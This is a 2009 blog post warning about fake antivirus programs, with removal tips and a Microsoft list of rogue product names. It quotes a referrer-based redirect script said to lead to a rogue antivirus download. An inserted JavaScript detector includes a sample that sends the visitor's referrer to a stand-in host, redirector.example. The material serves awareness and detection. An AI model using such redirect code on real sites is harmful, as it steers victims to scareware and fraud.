Brainfoldb4u's Blog


Fake Antivirus Software list nov 2009

Posted by brainfoldb4u on December 28, 2009

Nowadays it has become common for computer users to receive a pop-up from a legitimate website alerting them to a virus or trojan and offering antivirus software to remove it, even though no such infection exists. These pop-ups are actually created by skilled programmers turned hackers and cyber criminals for personal gain or just a few extra bucks. These programs neither scan nor clean computers; they are designed to persuade users that their computers are at risk and scare them into buying the “antivirus” product. They insist that we install the solution they offer, either for free or for a few bucks.

Fake antivirus programs of this type are widespread and are mostly used by internet criminals. Kaspersky Lab says it identified more than 20,000 samples in the first half of 2009. Antivirus company Symantec claims to have found 250 varieties of scam security software with legitimate-sounding names like Anti virus 2010 and SpywareGuard 2008, and about 43 million attempted downloads in one year, but did not know how many of the attempted downloads succeeded. [Source: Symantec]

How do these rogue programs end up on victim machines? A tailored Trojan horse can be used to download such rogue programs, or a drive-by download can take place when a user visits an exploited website. More often, these programs get onto a user's computer either by mistake or through enticement by cyber criminals. The criminals behind this software manage to hide the IP address of the page from which the malware downloads and installs.

Kaspersky Lab has recently identified a technique used for the dynamic download of rogue antivirus programs. Here’s an example: a script on ********.net/online-j49/yornt.html generated a redirect address, 'http://******' + encodeURIComponent(document.referrer). The address generated depended on how the user arrived at the page containing the script (determined with the help of document.referrer), or, in other words, on which site the user had previously viewed. In this case the redirect led to a page hosting a new rogue antivirus program, FraudTool.Win32.AntivirusPlus.kv.
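From the defender's side, the referrer-keyed redirect described above can be flagged when triaging scripts pulled from a suspicious page. The following is an added example, not part of the original post or of Kaspersky's analysis; the function name, the sample scripts and the redirector.example host are constructed for illustration.

```javascript
// Added example: triage heuristic for referrer-keyed redirects.
// Sample scripts and the redirector.example host are constructed.
const SAMPLE_REDIRECT = [
  "var q = encodeURIComponent(document.referrer);",
  "var target = 'http://redirector.example/in.php?ref=' + q;",
  "window.location = target;",
].join("\n");

const SAMPLE_BENIGN = [
  "var ref = document.referrer;",
  "if (window.location == ref) { console.log('same page') }",
  "document.getElementById('back').textContent = ref;",
].join("\n");

// Navigation sinks: assignment to location / location.href, and calls to
// location.replace(), location.assign() or window.open().
const SINK = new RegExp(
  "\\blocation(?:\\.href)?\\s*=(?!=)" +
  "|\\blocation\\.(?:replace|assign)\\s*\\(" +
  "|\\bwindow\\.open\\s*\\("
);
const REFERRER = /\bdocument\.referrer\b/;
const ASSIGN = /^(?:(?:var|let|const)\s+)?([A-Za-z_]\w*)\s*=(?!=)/;

// Returns the statements that navigate to a value derived from
// document.referrer, following the value through simple variable assignments.
// Statements are split on ';' and newlines, so this is a heuristic, not a parser.
function findReferrerRedirects(source) {
  const tainted = new Set(); // variables holding referrer-derived data
  const findings = [];
  for (const raw of source.split(/[;\n]/)) {
    const stmt = raw.trim();
    if (!stmt) continue;
    const derived = REFERRER.test(stmt) ||
      [...tainted].some((v) => new RegExp("\\b" + v + "\\b").test(stmt));
    if (!derived) continue;
    if (SINK.test(stmt)) {
      findings.push(stmt);
    } else {
      const m = stmt.match(ASSIGN);
      if (m) tainted.add(m[1]);
    }
  }
  return findings;
}

console.log(findReferrerRedirects(SAMPLE_REDIRECT));
```

A hit means only that the page chooses its destination based on where the visitor came from; legitimate analytics code can do the same, so each finding still needs a manual look at the destination.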

Once the program has been downloaded, these are some of the symptoms and the actions taken to frighten users:

  • If your computer is infected, you will probably receive a high number of fake warning alerts, along with more pop-ups and a hijacked homepage. You may also see your computer running unusually slowly, with its performance compromised.
  • Sometimes, to make it more convincing, a fake infected file is installed on the computer together with the rogue antivirus, and the same fake infected file is later detected during the scan.
  • The software then recommends cleaning the virus (though you may not have one) from your computer, in return for money for their solution.
  • If the user by any chance clicks the “remove virus” button, a new window opens asking them to purchase the fake product. If you choose to buy the software, different payment methods such as PayPal, Amex, Visa and bank accounts are shown as if they were legitimate.

Some basic steps users can take to avoid further problems:

  • A rogue antivirus infection will not damage the user's machine; these programs are used by cyber criminals to make money from inexperienced users.
  • To avoid getting trapped, Google the antivirus name that comes up and check whether it has an official site, technical support or phone support.
  • Be aware that legitimate antivirus companies (both commercial and open source) will not scan your computer for money. Never click the “install” button if you don’t know what the pop-up says.

If you choose to get rid of the problem yourself, here are some basic steps to identify the fake antivirus and delete it. Uninstall the suspected antivirus program using the Add/Remove utility in the Control Panel. After removing it, restart your computer in Safe Mode. Then launch Microsoft Security Essentials, or a product from the firewall vendor of your choice, and run a scan against system files and folders to remove the suspected applications. In some situations you may need to remove it manually. Make sure to back up your important files. Press Ctrl + Alt + Del to bring up the Task Manager. Click on the fake antivirus image name and choose to stop it from running. Go to Start, Run. Type regedit to start the Registry Editor, where you will drop the entries for WinAntiVirus. Browse to the HKEY_LOCAL_MACHINE\Software folder from the My Computer folder and delete the series of Registry entries that are described under the fake antivirus thread. Google the virus to get as much information about it as you can, and try to manually delete it from your Windows folder, but make sure to stop the file's processes in the Task Manager before you actually delete them.

PC manufacturer's solution:

To protect your computer, try installing and running an up-to-date antivirus product such as Microsoft Security Essentials from Microsoft (see my earlier article on Microsoft's free antivirus software). MSE provides real-time protection against viruses, trojans, spyware and adware. Another option is to run a virus scan with the Windows Live OneCare safety scanner. Microsoft’s Windows Defender can also be used to remove spyware and other potentially unwanted software from your computer.

Latest list of rogue antivirus software from Microsoft

Microsoft has released a list of the significant threats that AV rogues have posed to its users this year. Besides the prevalent rogues covered by the MSRT, the following is a longer list of AV rogues detected by Microsoft AV products such as Microsoft Security Essentials, Forefront Client Security, etc.

FakeXPA Winfixer FakeSmoke SpywareSecure
FakePowav FakeScanti Spyguarder IEDefender
MalwareBurn Cleanator AntivirusGold MalWarrior
UnSpyPc MalwareCrush SystemGuard2009 Malwareprotector
DriveCleaner PrivacyChampion WorldAntiSpy SpywareSoftStop
DocrorTrojan SystemLiveProtect Yektel AntiSpyZone

Antivirus2008 Winwebsec FakeSecSen FakeRean
PrivacyCenter FakeRemoc VirusRemover Antivirus2009
SpyLocked SpywareStormer Privacywarrior AntiSpywareDeluxe
Trojanguarder SecurityiGuard PrivacyProtector Searchanddestroy
MyBetterPC DoctorCleaner SpyBlast AlfaCleaner
NeoSpace UniGray FakeFreeAV WebSpyShield

InternetAntivirus WinSpywareProtect FakeSpypro AntiSpywareExpert
Antivirusxp Fakerednefed FakeCog VirusRanger
ErrorGuard Antispyware2008 AntiVirGear SpyDawn
SpyCrush EZCatch VaccineProgram UltimateFixer
Fakeav EvidenceEraser TrustCleaner WinHound
Spyaway Vaccine2008 SearchSpy Spyshield

SpySheriff FakeVimes FakeIA AdvancedCleaner
Antispycheck PCSave AntispyStorm FakePccleaner
SpywareIsolator PSGuard Antivirustrojan SpywareQuake
SpyFalcon SpywareStrike XDef WareOut
PrivacyRedeemer Nothingvirus AntiSpywareSoldier Kazaap
VirusConst AVClean AdsAlert SystemDefender

FakeSpyguard Fakeinit SpyAxe
SpyHeal AntiVirusPro Awola
VirusBurst CodeClean MyNetProtector
VirusRescue Spybouncer FakeWSC
TitanShield MalwareWar DoctorAntivirus
Easyspywarecleaner VirusHeat UltimateDefender

Source: Microsoft fake security Anti virus run up

This list from Microsoft includes new and recent rogues such as FakeXPA, FakeSecSen and FakeRean. It also contains some older rogues dating back 4 years, such as Winfixer and SpySheriff.


Unfortunately, these programs are getting more common. Microsoft encourages PC users to run a complete, up-to-date antivirus product such as Microsoft Security Essentials to protect their computers from these rogues. Don’t believe any pop-up; rely on your own Google search instead. Awareness of the threat is very important. Have a look at some of these threats, get familiar with some of the names and screenshots, and pass the word on to your friends and family.
